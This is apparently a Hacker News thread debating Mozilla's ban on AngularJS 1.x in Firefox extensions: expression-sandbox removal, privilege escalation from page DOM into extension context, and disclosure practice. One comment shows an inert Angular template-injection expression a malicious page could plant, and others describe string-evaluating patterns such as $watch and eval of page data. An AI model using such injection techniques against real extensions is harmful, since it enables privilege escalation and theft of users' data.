Many commenters here seem to be completely misunderstanding the situation.
Browser extensions are really dangerous; if you need to keep your machine secure, you shouldn't use any, IMHO. By definition, browser extensions need to be able to access things such as page content. What would stop someone from writing an extension that captures your bank credentials? Nothing.
Obviously no security-conscious user is going to install a bank credential stealing extension. But what about bugs in extensions? If a buggy extension can be made to execute arbitrary code, it is as dangerous as a malicious extension (if the arbitrary code execution works in the same circumstances).
Angular 1.x basically runs eval on DOM content. That's how it works, it's not a vulnerability in normal use. You make a web page using Angular, and possibly the user has a way to eval arbitrary JS code through Angular, but then they have the developer console so they can run arbitrary code anyway.
With browser extensions it's different. The extension comes from one source and runs with one set of privileges, and the page comes from someone else and has fewer privileges. Now if anything from the page can be eval'd in the extension, that's privilege escalation: someone creating a site can run malicious code with the extension's privileges.
It's probably possible to sanitize all external inputs used in the browser extension such that privilege escalation isn't possible, but the Angular team has tried hard with their sandbox solution with no success. Extension developers will hardly do much better, so it makes sense for Mozilla to ban the whole library.
Angular wasn't designed for browser extensions.
WRT the security researcher and Mozilla not disclosing other known sandbox vulnerabilities, that's missing the point (but an interesting discussion in itself).
> It's probably possible to sanitize all external inputs used in the browser extension such that privilege escalation isn't possible, but the Angular team has tried hard with their sandbox solution with no success. Extension developers will hardly do much better, so it makes sense for Mozilla to ban the whole library.
AngularJS runs expressions that are in your page's HTML when it initializes (or when you explicitly call angular.bootstrap on an element), but only on the page where it is loaded. If an extension uses Angular within the extension, that's perfectly fine, security wise. Unless the developer explicitly requests it, pages visited cannot move code into an extension's context (which would be dangerous in any case, Angular or not).
Even when the developer explicitly moves data from a web page into the extension context, this does not cause a security issue, even when the data ends up in the DOM. Once loaded, Angular does not revisit the DOM to run expressions in it (otherwise all Angular pages would be compromised). Care has to be taken when using things like ng-bind-html, but the security profile for an extension is the same as a regular web page here. With Angular's $sce service and automatic escaping/sanitizing, it's actually reasonably easy to write safe web applications that properly escape user input.
All of this is unrelated to the expression sandbox. The sandbox was never intended to be a security feature, but rather a feature to keep developers from shooting themselves in the foot (e.g. by creating global variables). It was considered to be a defense-in-depth mechanism for a while, but it turns out it is at best misleading for users who believe it protects them. That is why we removed it.
Thanks for the reply. I mistook the sandbox to be related to $sce. It's been a while since I last coded Angular.
So you're saying that Mozilla is mistaken in their decision, and the only way for page content to be eval'd with extension privileges is if the developer was careless with ng-bind-html or $compile?
Yes, Angular itself is fine, and there's no problem with escaping or eval'ing per se.
However there is a corner case in which Angular being present in an extension might weaken some security measures. It requires multiple issues to happen together, including the victim page being vulnerable in the first place. I'm actually not sure if that is the issue Mozilla was thinking about, but it is a problem. We will put some defense in depth into Angular to mitigate this, but I believe it's a general issue with how extensions are handled, not limited to Angular.
Sorry for being a bit vague, but no patch has been released yet.
> The sandbox was never intended to be a security feature, but rather a feature to keep developers from shooting themselves in the foot (e.g. by creating global variables). It was considered to be a defense-in-depth mechanism for a while, but it turns out it is at best misleading for users who believe it protects them. That is why we removed it.
For apps using Angular 1.5, do any changes need to be made to move up to Angular 1.6 without the sandbox? Does Angular lose any features with the removal of the sandbox?
> By definition, browser extensions need to be able to access things such as page content. What would stop someone from writing an extension that captures your bank credentials? Nothing.
Completely agreed. This is why it's so frustrating that all of the browser vendors have moved to this, "gut every minor option/feature possible, people can just get an extension" attitude.
For Firefox:
* removing the option to not maintain download history
* removing the option for the compact drop-down menu from the URL bar
* forcing tabs on top
* forcing refresh button to the right-hand side of the interface
For Chrome:
* removing backspace navigation (you may dislike it, but others don't)
* disabling middle-click to scroll on Linux
* removing the option to set your new tab page (eg to about:blank)
* not letting you prevent HTML5 video autoplay
* not letting you disable WebRTC
Just the backspace extension alone requires basically carte blanche access to everything just to be able to insert a tiny Javascript function to catch the keypress.
I'm not asking for us to go back to the Mozilla suite with integrated mail client, news reader, etc. Just ... it's okay to have an "advanced options" section that lets us control some of this really simple, really basic stuff. And not only okay, a major security benefit to do so. All the focus on web security, you'd think they'd take this stuff more seriously.
They could at least make it possible to choose not to upgrade a very simple extension which we may have personally reviewed.
I want a fixed (read: no updates) extension that does this: on key press, check if the key is Backspace; if it is, check whether any form element is focused; if not, go back. One line of JS, I guess three with nice formatting. If I create this, I need to submit it to the Chrome Store so Chrome won't complain about untrusted extensions.
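Something along these lines, I'd guess (a rough sketch of the logic just described, not actual extension code; the "form element is focused" check here is deliberately simplistic):

  // content script: go back on Backspace unless an editable element is focused
  document.addEventListener('keydown', function (e) {
    var el = document.activeElement;
    var editing = el && (el.tagName === 'INPUT' || el.tagName === 'TEXTAREA' || el.isContentEditable);
    if (e.key === 'Backspace' && !editing) history.back();
  });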
Of course they also removed the ability to tell it that I know what I'm doing.
I agree but unfortunately it's not a very popular design pattern these days.
Because of this I basically have no applications installed on my android smartphone since even trivial applications often end up requiring ridiculous amounts of privileges (often for relatively minor features) and of course there's no way to fine tune what you allow and what you don't.
Honestly I think that's a terrible habit to give your users: just ignore the privilege list, since there's nothing you can do about it, and click "sure, whatever".
Devs should have to justify why the app needs the feature and I should be able to disable it if it's not critical for the application to work correctly. It would make it a bit harder to write and test those apps but it's not like it's rocket science either...
Sidenote: that is pretty much exactly what Google's (alas, auto-updated) "Go Back With Backspace" [0] does: [1] (you forgot Shift+Backspace; Google did as well in past versions).
> It's probably possible to sanitize all external inputs used in the browser extension such that privilege escalation isn't possible, but the Angular team has tried hard with their sandbox solution with no success. Extension developers will hardly do much better, so it makes sense for Mozilla to ban the whole library.
Sandboxing in JS should be possible these days. Spin up an iframe, add the sandbox attribute, load JavaScript into it, postMessage the code you want to execute to it, await the return value. Voila, you've executed untrusted code in an isolated origin context.
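A minimal sketch of that approach (assumptions: the untrusted code is a plain string, its result is structured-cloneable, and no CSP on the embedding document forbids eval inside the srcdoc frame; error handling and origin checks are mostly omitted):

  // host side: create a sandboxed, unique-origin iframe that evals messages it receives
  const frame = document.createElement('iframe');
  frame.setAttribute('sandbox', 'allow-scripts');   // scripts run, but in an opaque origin
  frame.srcdoc =
    '<script>' +
    'window.addEventListener("message", function (e) {' +
    '  var result;' +
    '  try { result = eval(e.data); } catch (err) { result = String(err); }' +
    '  e.source.postMessage(result, "*");' +
    '});' +
    '<\/script>';
  document.body.appendChild(frame);

  // host side: send code in, get a serializable result back
  window.addEventListener('message', function (e) {
    if (e.source === frame.contentWindow) console.log('sandbox returned:', e.data);
  });
  frame.addEventListener('load', function () {
    frame.contentWindow.postMessage('1 + 1', '*');
  });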
You can't run code that depends on variables in the page context though. If all the input values are serializable, then you can postMessage them into the iframe too, but you can't serialize objects with arbitrary methods, etc. The code you run in the sandbox can't return back a rich object with arbitrary methods because that has to get serialized back out. You can't use getters and setters to transparently proxy all accesses because postMessage is asynchronous. Even if you restrict everything to only dealing with objects with promise-returning functions, I'm not entirely sure if you can get this all to play nicely with garbage collection (say you have an object outside of the iframe which is only referenced -- through the proxy system -- by an object inside the iframe which is only referenced by that object outside of the iframe)...
Iframe sandboxing is far from a drop-in solution for this type of problem in an existing codebase.
Access to arbitrary methods would go against the idea of sandboxing anyway. If something references the global object for example you suddenly would have access to a privileged fetch API or other extension APIs.
Maybe, if you use a WeakMap with a transferable object, and assuming that if you postMessage a transferable object and then get it back later, the WeakMap still recognizes it as a key. I'm not very sure that last part would work. I don't think GC links reach through iframes in a way that would enable that.
WeakMaps are more limited than most people seem to expect. They're powerful tools that enable many new powerful patterns, but they don't expose the workings of the garbage collector. They're very different from Java's WeakHashMap for example. In Javascript, the only way you can tell whether the browser is using a garbage collector or not is to try to run out of memory. Without crashing, there's no way for some Javascript code to observe the runtime's GC behavior at all by design.
Object identity is not preserved with Transferring or regular structured cloning. Transferring is really about the resource represented by, or held onto by, the object being transferred.
If object identity (for the purpose of WeakMap) was preserved, your idea would provide a way to observe GC behavior. Which wouldn't automatically be a complete disaster, though I am personally dead set against it except maybe in some sort of privileged context. Weak references keep getting proposed, and there are some pretty compelling use cases, but there is also some very major risk that we could never back out of once weakrefs were available, and they could permanently hold back future GC performance. (You could easily break deployed web applications by improving GC behavior.)
(Source: I implemented Transferring in general and Transferring ArrayBuffers in particular in Spidermonkey, and I work on the GC engine. And it's nice to see a comment on HN like the parent that gets it right for once!)
But the issue of preventing arbitrary Javascript code from running based on user input isn't limited to Angular; it's been a problem since the beginning of time!
What about Angular is so special that it needs to be blacklisted? It will likely still be safer than ad-hoc client-side templating that people will do instead.
> By definition, browser extensions need to be able to access things such as page content.
On Firefox/XUL maybe. Web Extensions (like in Chrome) work much like Android apps: You need to acknowledge their desired permissions up front. They can’t request more later.
Of course you may need these permissions to create your extension.
The vulnerability described by op applies to chrome just the same. Once the addon has `pageCapture` permission, an angular 1 exploit would work just the same.
Many extensions have full access to all webpages, also in chrome; there's no sandbox or anything similar safely separating extension from page. That's not a bug or missing feature: it's by design! Many extensions fiddle with all kinds of page aspects as part of their core functionality.
An adblocker that can't inspect the page dom would likely not work very well.
BROWSERS are really dangerous; if you need to keep your machine secure, you shouldn't use any IMHO. By definition, browsers need to be able to access things such as page content. What would stop someone from writing a browser that captures your bank credentials? Nothing.
Obviously no security-conscious user is going to install a bank credential stealing browser. But what about bugs in browsers? If a buggy browser can be made to execute arbitrary code, it is as dangerous as a malicious browser...
At the end, it's a matter of trust in your browser or your extensions.
I see what you're getting at, but with only a handful of browsers* maintained by large organisations eager to protect their reputations vs a plethora of extensions out there, your argument doesn't hold so well.
* I'm assuming usage of Chrome/IE/Firefox/Safari here.
The quoted paragraph is buildup to the fact that AngularJS evals content on purpose, and does not really even try to be secure against maliciously-crafted DOM. Browsers, on the other hand, are designed to resist attacks.
But yes, certainly you need to trust the browser more than an extension.
Note that the Angular team is working with Mozilla and the researcher on this (see https://github.com/mozilla/addons-linter/issues/1000#issueco...) and that NDAs are a real, if insane, thing still to this day, and there is literally no way to legally compel any party to admit to being under NDA except in a court of law.
Should the researcher have told the Angular team? Yes. Should they have told the entire world? Probably not. Should Mozilla tell the world? Probably even less so. As long as the parties are talking (which they are), this is an unfinished security review on lock-down to prevent exploitation in the interim.
Also, let's not inundate the page with extraneous comments unless we're already part of one of the projects involved. We all have strong opinions, and the HN post has been linked in the issue, so the devs can come here to see discussion if they want it.
Let's be good GH citizens. :-) Nobody benefits from the Issue ending up locked because the discussion got too off-topic.
The mentioned vulnerability was most likely another sandbox escape. The sandbox is described as "not a defense mechanism" by the Angular team, and the sandbox was removed entirely in the 1.6 release[0]. They admit that Angular isn't secure for cases where an attacker can control the template: this case includes extensions! I'm not going to fault someone for not reporting a security issue with an already-removed feature specifically described as not a security feature.
Before anyone misreads this: the sandbox being removed in 1.6 doesn't mean that Angular 1.6 is safe to use in extensions. It just means that Angular stopped pretending it was safe there. A fundamental part of Angular is evaling text from the DOM. If the DOM is controlled by an attacker, such as a webpage trying to elevate to extension privileges, then you're out of luck. Sandboxing eval is a very large and difficult task that would bloat Angular, all for a use-case that they are not interested in. Angular 1.x is the wrong tool for the job.
NDAs are a real, if insane, thing still to this day
Some of the big security bugs recently have been disclosed to big players like Google and AWS before they were publicly disclosed.
If you want to retain that privilege, you need to show you can keep your mouth shut when security researchers disclose something to you - NDA or otherwise.
When you release a patch, anyone who gets it can see what you changed and figure out an exploit from that. Because it's good for people to be patched /before/ that happens, some vendors give certain major customers early access to patches - so long as they maintain a proven track record of not disclosing anything about them.
For example, Xen has a 'pre-disclosure list' [1] so if they have a critical security patch, Amazon, Google, Linode, Oracle, Rackspace, and several Linux distro developers [2] get the patches early.
Obviously, we can debate the morality and wisdom of this policy - personally as I haven't discovered any critical security bugs, I've never faced this particular moral conundrum.
Because big players can take remedial action prior to the bug being disclosed to protect users - for example, banning a specific framework from browser extensions.
This "vulnerability" is harder to exploit in Chrome because extensions in Chrome (unlike in Firefox) have their own private DOM, and settings page have isolated DOM too. If an extension uses Angular only with its private DOM there is no vulnerability.
The vulnerability can be exploited only if an extension is running Angular on an untrusted page which is less likely in Chrome (but of course one should not underestimate the level of incompetency of a modern frontend developer).
UPD: @bzbarsky noted that Firefox is using the same security model as Chrome so both browser extensions can be vulnerable. To exploit a vulnerability, several conditions should be met: 1) extension should inject Angular into a web page 2) attacker should be able to find a way to get from content script context into extension's background page context.
Note that the github discussion is about Firefox webextensions, which have the same security model as Chrome extensions (and in fact aim to be API-compatible with Chrome extensions).
Chrome has many many extensions which run on and modify the page DOM just like Firefox! I think it might even be reasonable to guess that around half of extensions do this.
Modifying the DOM is not enough to cause a vulnerability. In Chrome, content scripts (the ones that are injected into a page from an extension) have limited privileges, though there can still be ways to exploit them.
Chrome content scripts can have permissions to make AJAX requests to any origin. Sure, it's not a straight ticket to native code execution and installing malware on your machine, but it means an exploit against an extension with wide enough permissions could harvest your email and bank info.
It's completely expected both to inject scripts into a page's DOM and to set up a communication channel back from the content script to the central extension "process". It's not a rare corner case. An ad-blocking content script might want to report user-selected extra filter requests back to the main adblocker context; or it may simply want to count the number of blocked requests; or a password manager may want the ability to save new passwords; etc.
Typically, you'd expect the central extension to trust messages it receives from its own content scripts, so even though there is a separation between the extension and the pages it's on, the separation is by no means a leak-proof security measure; it cannot be. You rely on each and every such extension being carefully written and having no security relevant bugs.
If you think about it, it should be clear that it's practically infeasible to fix this hole. Extensions authors simply need to avoid such bugs. If angular1 somehow makes it easy for them to make mistakes when used by an extension, that's a problem.
Don't update your post to include replies to your own comment. Hackernews already allows us to see the replies. If you have a response to a comment, reply to that comment.
Chrome extensions are less of an issue though, no? IIRC Firefox addons are significantly more powerful than Chrome extensions, so locking things down tighter makes sense anyway, a low threat on Chrome could be much higher on FF.
If a Chrome extension has permissions to an origin, then it can freely make cross-domain requests to it from any page. So if you have an extension using Angular 1.x on every page and you browse to a malicious page, the page could contain text in the DOM that Angular evals from within the extension. That code could then make an AJAX request to any origin with your cookies, and make requests for your bank info or emails and do things like steal data or change your passwords.
The discussion here is about Firefox webextensions, which use the Chrome extension API and are not supposed to be more powerful than Chrome extensions.
It's possible to write Firefox extensions in JavaScript that are a lot more powerful than Chrome extensions (or webextensions, which are the Firefox equivalent of Chrome extensions) are. That capability is slowly being phased out, though.
No, historical XPI addons are in JS (and XML and CSS). While they can bundle native code, most don't, but they run at the same privilege level as the browser itself (consider Firebug, which was and still is an addon).
So, there are so many problems with this I don't know where to begin. Since folks have already noted the "not notifying Google" issue, let me point out another:
Prior to the ban, I can find literally no discussion or details about this being about to happen (i.e. no notice), pretty much ever.
I can find no discussion around it (maybe it's there but I'm missing it? I looked in a lot of places).
You can see it fixed an issue to "warn third party developers of things we banned/don't advise", but there's nothing about initially banning anything there, and it was added with an initial ban list containing Angular. I would have expected a page added, then a ban discussed, then a ban added. Or something.
This seems really bad. I would have expected, at the very least, a heads up to extension developers or something or even a more public notice when it happened so that some discussion could be had about it.
Instead, it looks like the only way you would have found out about it is by trying to lint an extension and seeing it banned (i.e. after you developed it), or by somehow randomly browsing the doc pages Mozilla has.
> Instead, it looks like the only way you would have found out about it is by trying to lint an extension and seeing it banned (i.e. after you developed it)
It's one of the big dangers of a "walled garden": you are subject to the whims of the arbiter.
Google has repeatedly been equally abrupt in making breaking changes to other people's apps/products/pages/sites to resolve security problems. I'm glad they do, and I'm glad Mozilla isn't fucking around with stuff like this either.
1. Just because one guy is an idiot does not mean the other should be.
2. You know, you may want to tell people, and establish a process for telling people, that this is happening (i.e. it should not take until a person files a GitHub issue asking what's up when they validate their app for them to know what is and isn't going to be okay)
(and if the answer is "google doesn't do that", see #1 :P)
Sorry, yes, that was crass, and I apologize. Sadly, I can't edit it anymore.
I meant it really in the sense that: You have given no reason this couldn't have been done in a fashion that provided the barest minimum of notice or information. Doing so when you can do so is the right thing, and if someone else is not doing that, that does not mean you should duplicate that process.
As far as I know, nobody has claimed otherwise, here or there.
In fact, there are a number of factual inaccuracies that seem to have been driving parts of this decision (e.g. "Google has stopped supporting Angular 1") that a trivial notice and discussion process probably would have corrected.
Past that, nothing in this discussion has pointed to anything so urgent (especially given the 6+ month time period involved between the original presentation and any notice at all that it was banned, and then another 6 months till now) that it required immediate action at the point they did it.
If there was something, again, someone could have, at the very least, said that ("Hey, we discovered a problem, we're going to take immediate action, this may hurt. Sorry").
TL;DR: I'm a fan of "ready, aim, fire", not "fire, ready, aim".
If it can't be done that way, fine, but no data says that this was the case here.
Sorry, I thought I had written a longer comment but got distracted, so that came out sharper than I meant.
I agree. Notice is good. But all sorts of pressures interfere with notice, like embargoes, multiple stakeholders, threat intelligence, IR and active exploitation, and so on.
The important thing is to close the vulnerability. Everything else is distantly secondary.
Also, and respectfully: it is not so much Mozilla's job to know the maintenance status of Google Javascript libraries so much as it is Google's responsibility not to ship Javascript code (or extensions) that make Mozilla insecure.
Using big external libraries in Firefox add-ons used to be totally prohibited. jQuery used to be prohibited outright. It's an undesirable practice. Add-ons operate at a higher privilege level than web pages. The low-quality webcrap that can be tolerated on a web page has no place in a privileged add-on.
Really it doesn't matter if it's for display purposes or not. It all boils down to implementation. I can make a view library riddled with XSS vulns in very little time.
It's possible that the vulnerability only affects Angular running in Firefox addons, and not the general web. Mozilla takes an aggressive stance on what they allow in vetted browser extensions, as they should.
JS in addons runs in a different, more privileged environment than normal web pages, and isn't restricted by things like same-origin (although this is improving with Firefox's new extension APIs). Any project the size of Angular is bound to have security issues when run outside of the environment it was designed for.
No, the vulnerability specifically has to do with Angular within extensions. Angular trusts the page DOM and uses eval-like functions on code within it. This is relatively fine if the DOM isn't controlled by someone else, but in cases where the DOM is controlled by someone with fewer permissions (i.e. Angular is running in a higher-privilege extension, and the DOM is controlled by some webpage), then an attacker can elevate their permissions by writing code into the DOM and letting Angular execute it within the extension.
Don't extensions have their own DOM (like they have in Chrome)? Why would anyone run Angular on a browser page? It would probably conflict with existing application.
It looks like Firefox extension architecture has design problems.
And I don't like the presentation. One could think that Angular is vulnerable which is not true. The vulnerability appears when it is used in a wrong way in a browser extension.
This is an issue with extensions that run code on webpage DOM. It's very popular for extensions to modify webpages. Chrome supports extensions like this too. I might even guess that more than half of extensions do this.
>Why would anyone run Angular on a browser page? It would probably conflict with existing application.
Adding additional widgets or tools directly within an existing webpage is a common thing for extensions to do. And if you're adding a lot of UI, you might want to use an existing UI library like you would on a normal webpage instead of doing all the DOM by hand. Not all UI libraries work out well for this apparently.
Because you want to manipulate its DOM and Angular is what you're familiar with?
> It would probably conflict with existing application
Note that it would operate on the same _DOM_ but not in the same scripting environment. That is, if you have a DOM element "foo" that comes from the web page, then doing:
foo.somePropNameIMadeUp = 5;
will set a property that is not visible to the web page, while doing:
foo.setAttribute("id", "myId");
or:
foo.id = "myId";
will modify the DOM in a way the web page can see.
So the risk is that an add-on injects Angular 1.x into an external web site; this web site, being malicious, modifies its own DOM so that Angular evals expressions from that DOM within the scripting environment running at a higher privilege.
What if the malicious web site does something like <script src="resource://dumb-addon/angular.min.js"></script>? On Firefox, I verified this loads Angular into the web site, but what about the privilege level? Will it be the original one from the page, or higher?
As a side note, with the Chrome equivalent <script src="chrome-extension://dumb-addon/angular.min.js"></script>, the loading fails with an exception saying "chrome-extension://" is not an allowed source.
In my extension, I modified the angular.min.js file to insert this as the first line:
Basically, it throws an exception if the library is not loaded from a local "resource://" page (hopefully considered safe since it is part of the add-on code). I verified this prevented loading Angular via the <script src="resource://..."> trick, or when Angular was inadvertently injected using a Firefox frame-script (nsIFrameScriptLoader.loadFrameScript) and the add-on sdk/page-mod or sdk/content/worker modules.
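The exact line isn't reproduced in the comment, but a guard matching that description might look roughly like this (the location.protocol check is an assumption, not the commenter's actual code):

  // hypothetical first line of the modified angular.min.js:
  if (window.location.protocol !== 'resource:') {
    throw new Error('angular.min.js may only be loaded from a resource:// page');
  }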
Can we consider it safe to use Angular 1.x only from local add-on panels to run the user interface?
> What if the malicious web site does something like <script src
That will run with the website's privileges. Just like site A loading a script from site B will run it with site A's privileges.
> the loading fails with an exception saying "chrome-extension://" is not an allowed source.
Chrome extensions (and webextensions) have a way to flag particular files as "web-exposed". Ones that are not can't be loaded via the web.
Firefox has something similar for chrome:// URIs in non-webextensions, but resource:// allows loads from the web in certain contexts, which include <script> elements.
> Can we consider it safe to use Angular 1.x only from local add-on panels to run the user interface?
I don't know the details of what the security issues reported on angular 1.x are, so I can't claim that it's safe or not safe. But at first blush, as long as angular is only interacting with the addon's own DOM, and the addon DOM never injects any text from a page DOM into itself, it _seems_ like it should be safe.
The presentation is fantastic. It proves beyond a doubt that Angular is vulnerable in the context that it claims to offer a security feature that is manifestly insecure. And I mean, they're evaling JS code in the template engine, this shouldn't be a surprise. To be clear, Angular from its inception claimed to offer "safe" templating. So this is a big deal.
Browser extensions in all browsers typically do things to the web page DOM for various reasons. I don't know how the technical details work since I've never written one, but chrome addons can certainly change things about the web page DOM.
Not necessarily. JS in addons has to run in a more privileged environment to interact with the browser. However, that makes it possible to write insecure addons. In this case, Angular 1.x might contain the insecure code.
For example: arbitrary user input from a web page is passed to the addon. Angular handles it, and does "eval-like things"[0] with it. Now the attacker is running arbitrary code in a privileged environment.
[0] eval-like things is a core part of how Angular works. So the vulnerability doesn't necessarily apply to Angular 1.x in a normal web page. But it wasn't designed to be run with higher privileges.
Every browser's addon runtime is different. Firefox is working on standardizing things with its WebExtensions API (modeled after Chromium's API). But potentially, yes.
They still see the same content in the DOM. The extension just has a separate javascript-wrapper around the DOM. This means that an extension will not be affected if a webpage monkey-patches a DOM method to do something else. But if a webpage places some specific text content inside an HTML element, then the extension will see that same text content! (And Angular running in the extension can still choose to recognize that content as a template and eval it.)
You can find the same kind of "vulnerability" in jQuery:
$(element).html(userInput);
This will evaluate scripts in userInput. Does this mean jQuery is vulnerable? No, it just means you are doing something wrong with it.
UPD: I was wrong; jQuery inserts a script tag into the DOM instead of directly calling eval(), so the code above is not equivalent to eval and is another type of vulnerability.
It will evaluate scripts with the permissions of the element being manipulated. Which in a normal webpage is the same thing as the script doing the manipulating, which means you have XSS, which is bad, yes.
In the context of an extension manipulating a web page, though, the jQuery thing you quote will evaluate the script with the permissions of the web page, not the permissions of the extension. On the other hand, doing eval() with a string from the web page will evaluate things with the permission of the extension.
So there is a pretty subtle (and irrelevant in web pages!) but important distinction between the two kinds of script injection here. In a web page they are more or less equivalent in terms of leading to XSS if you have untrusted input. But in an extension, the jQuery one is OK if your input comes from the web page itself, and the eval() version is not.
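To make the distinction concrete, a quick sketch of the two patterns inside an extension's content script (pageElement and untrustedStringFromPage are placeholder names):

  // the injected <script> runs in the *page's* context, with the page's privileges:
  $(pageElement).html(untrustedStringFromPage);

  // the string is evaluated directly in the content script,
  // i.e. with the *extension's* privileges:
  eval(untrustedStringFromPage);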
[Disclaimer: I work for Mozilla, but not on extension policy.]
No, that's the facile assumption to enable finger-pointing. My money is on an interaction between two legitimate design choices when considered independently.
Firefox wasn't designed to run Angular in an extension on webpage DOM. Angular wasn't designed to run in Firefox extensions on webpage DOM. Neither has a vulnerability when used as designed.
It's not safe for a 3 year old to drive a car, even if there's nothing wrong with the baby or the car.
The vulnerability specifically has to do with Angular being used in extensions where the extension has more privileges than the webpage it's affecting. Judging by http://www.slideshare.net/x00mario/an-abusive-relationship-w..., the issue has to do with a general design feature of Angular: it runs eval-like functions on text within the page DOM. Angular simply isn't built for cases where the page DOM is controlled by an attacker (i.e. Angular is running in a higher-privilege extension, and the webpage controls the DOM and wants to inject code into the higher-privilege extension). Angular has band-aids over a few specific ways that this can be taken advantage of, but it's extremely difficult to make bullet-proof (as blacklisting strategies often are) and it's not an issue that affects regular non-extension web pages.
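For a sense of what "the page DOM is controlled by an attacker" means here, a malicious page might do something like the following in the hope that a visiting extension runs Angular over its DOM (illustrative only; which payloads actually get through depends on the Angular version, as the linked slides discuss):

  // on the malicious page: plant an Angular expression inside ordinary-looking content
  document.body.insertAdjacentHTML('beforeend',
    '<div>{{constructor.constructor("/* attacker-controlled code */")()}}</div>');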
This "vulnerability" can be only exploited in specific cases when Angular is used in an unintended way - for example, injected in a web page from extension context in Firefox (which is wrong anyway because it would conflict with scripts on the page).
I tried to understand whether the same is possible in Chrome - injected scripts there have less privileges and use some form of isolation - but the manual [1] doesn't give a clear answer. The injected (and exploited) content script has lower privileges than an extension but has some API methods not available to scripts on a page. For example it can send messages to an extension and it could be exploited too.
But generally Chrome extension architecture provides more isolation and looks more secure especially when extensions are written by not very experienced developers.
I was writing about the problem in general, not specifically about Firefox extensions. Some may say that's not a vulnerability, but Angular v1 makes it very easy to shoot yourself in the foot by evaluating string-based values as expressions.
Imagine a case where some front-end developer gets JSON data from a remote data source over REST, with no idea about the data source's origin. Then, for example, there is a need to apply $watch to some fields of the received JSON object. Let's assume some of the fields contain JS code (previously it would have to be a sandbox-bypassing snippet, but since v1.6 it seems it can be plain JS with no obfuscation). As a result, XSS happens. They would do better to disable string-based expression evaluation for the listed methods https://docs.angularjs.org/guide/security and allow only passing a function as an argument; then it would be clear to developers that data sanitizing is up to the developer and is supposed to be implemented in the custom functions. But the design issue would still exist.
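A sketch of the pattern being described ($http, the endpoint, and the field names are hypothetical; the point is only that a string passed to $watch is parsed and evaluated as an Angular expression against the scope):

  $http.get('/api/untrusted').then(function (res) {
    // dangerous if res.data.expr is attacker-controlled: a string here is
    // compiled and evaluated as an Angular expression
    $scope.$watch(res.data.expr, function (newVal) { /* ... */ });

    // safer: pass a function, so nothing from the payload is evaluated as an expression
    $scope.$watch(function () { return $scope.model[res.data.field]; },
                  function (newVal) { /* ... */ });
  });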
Chrome extensions running in webpages share the DOM with the webpage. That's how they make modifications to the webpage.
They have their own javascript-wrappers around the DOM, so an extension is not vulnerable to a webpage overwriting DOM methods, but obviously the DOM still has the same content visible in it, and this can't protect extensions from using libraries which eval content within the DOM.
On the contrary: they reacted by removing the sandbox completely, giving up on handling sandbox-bypassing snippets. The problem is in the design of the framework and it can't simply be fixed.
Not true. Google has diverged development of Angular 1 and 2. Angular 1 was initially developed with designers in mind, but it caught on with developers. They developed Angular 2 with developers in mind. Angular 2 is different from 1 in many respects. I don't see Google dropping Angular 1 support anytime soon.
The explanation is in the issue thread now. If you have Angular running in an extension, if it sees Angular tags in the page you're viewing, it could execute them with the elevated permissions of the extension instead of the permissions of the page.
Bitwarden is a password manager? And their engineer is asking, after being told a hint of serious security issues in their framework, to just forget about it and let them publish?
No, the engineer is asking for more information so that he can determine if the application is truly affected by some unpublished Angular vulnerability or if Mozilla is just being too aggressive with their ban hammer because someone said "Angular 1.x was no longer being officially supported", which is false.
Followed up immediately with "Are all parts of Angular affected?" The charitable interpretation is that he is asking "is there a safe subset of Angular that we can use instead of a blanket ban?".
Yeah that's a fair (and more charitable) way to read that. But it's also not that clear. He spends a lot of time worrying about how much time they've spent on their extension.
Why no "woah, our other angular apps could be affected, is there any safe subset of angular 1?"
There aren't many products where security matters THAT much. I'd hope that the people working on password managers have a total security first mindset.
If you're the engineer in question (since your comment history suggests you work at Bitwarden), you should explicitly state that and explain that ignoring any vulnerability was not the intent of your comment.
It's good you updated the Github comment, but you should also consider explicitly stating your affiliation when relevant when commenting on Hacker News in the future.
If you had done in this case, it would have immediately cleared up encoderer's questions about your Github comment.
It's not doing much for your reputation (or that of your employer) that you still haven't clarified whether you are the engineer or not - even after deliberately referring to yourself in the third person and being called out for it.
"We banned any package containing Angular 1.x. We received a security report. One that we were asked not to share with you, one that we didn't even mention, we just went ahead and implemented the ban, didn't tell anybody."
The expression sandbox was not secure (and would be extremely difficult and heavily bloat the size of Angular to secure) and was not intended to be secure. It only blacklisted specific known attacks. As your link says, they removed it because people kept thinking it was a security feature they could rely on.
Angular runs eval on the page DOM. This isn't secure when the page DOM is controlled by an attacker (such as a webpage trying to elevate into an extension's privileges). Angular 1.x is the wrong tool to use within browser extensions.
Correct. Now it should be clear to everyone that Angular v1 is a dangerous thing by design and should not be used at all. Most likely a lot of not very experienced developers, for example, $watch a value provided by user input, and that's a 100% XSS vulnerability, since $watch evaluates the value if it is a string. And $watch is just one example; there is a list of methods that do expression evaluation.
I guess "extension's privileges" means more privileges than a regular web page has (accessing the file system, for example?); if so, then it's even more dramatic.
Right. Extensions have more privileges than normal web pages.
For the specific case here (webextensions), the extension asks for a list of permissions at install time, so which privileges it has, exactly, depends on the extension. https://developer.chrome.com/extensions/declare_permissions has documentation on what the various permissions you can request are.
It is not dangerous. The vulnerability appears when an incompetent developer injects Angular into a web page from a browser extension in Firefox (I don't know whether it would work in other browsers because they have a different extension architecture).
Ugh, this kind of thing gets my blood boiling. It was clearly said that _a security researcher_ disallowed Mozilla from reporting the vulnerability forward. It's the individual to blame, not Mozilla.
In any case, personally I wouldn't want to run a large privileged application as a browser extension when it's interacting with random webpages AND handling my security credentials. Too much attack surface.
The issue with Angular in extensions has to do with the fact it uses eval on the page DOM, which is controlled by the webpage. The webpage can put code into the DOM, and then let Angular execute it from within the higher-privileged extension.
Angular <1.6 had a sandbox feature which blacklisted specific attacks like this, but was not a general solution and was specifically not intended as a security feature. They entirely removed the sandbox in 1.6 because people kept thinking it was a security feature: http://angularjs.blogspot.com/2016/09/angular-16-expression-...
I'm not going to fault someone for not reporting a specific vulnerability with a specifically not-security feature that has already been removed.
Curious, do you use a password wallet/manager application, and if so how do you get passwords out of it and into the browser? I'd like to know if there's a better solution. (I use a browser extension.)
There were a few high profile ones recently reported by Tavis, but there have been many in the past, and it looks like no brand of password manager has consistently written safe browser extensions. They're written to be slick-looking and convenient, the actual security isn't visible enough to be a sales/popularity boost so it suffers. This very story/issue is another example in the making.
Was recently at an angular conference -- they said they would continue to support it until the _majority_ of the community had made the switch. That's so far from happening, I imagine they'll be supporting it for years.
based on that statement and others my read is basically:
We know a lot of important people and they gave us information you don't have, based on which we have made business decisions that affect you that we didn't communicate. Did we tell you? No. Now that you know, are we going to elaborate? Nope. Trust us, our people on the inside will be proven correct soon enough, so you can thank us later.
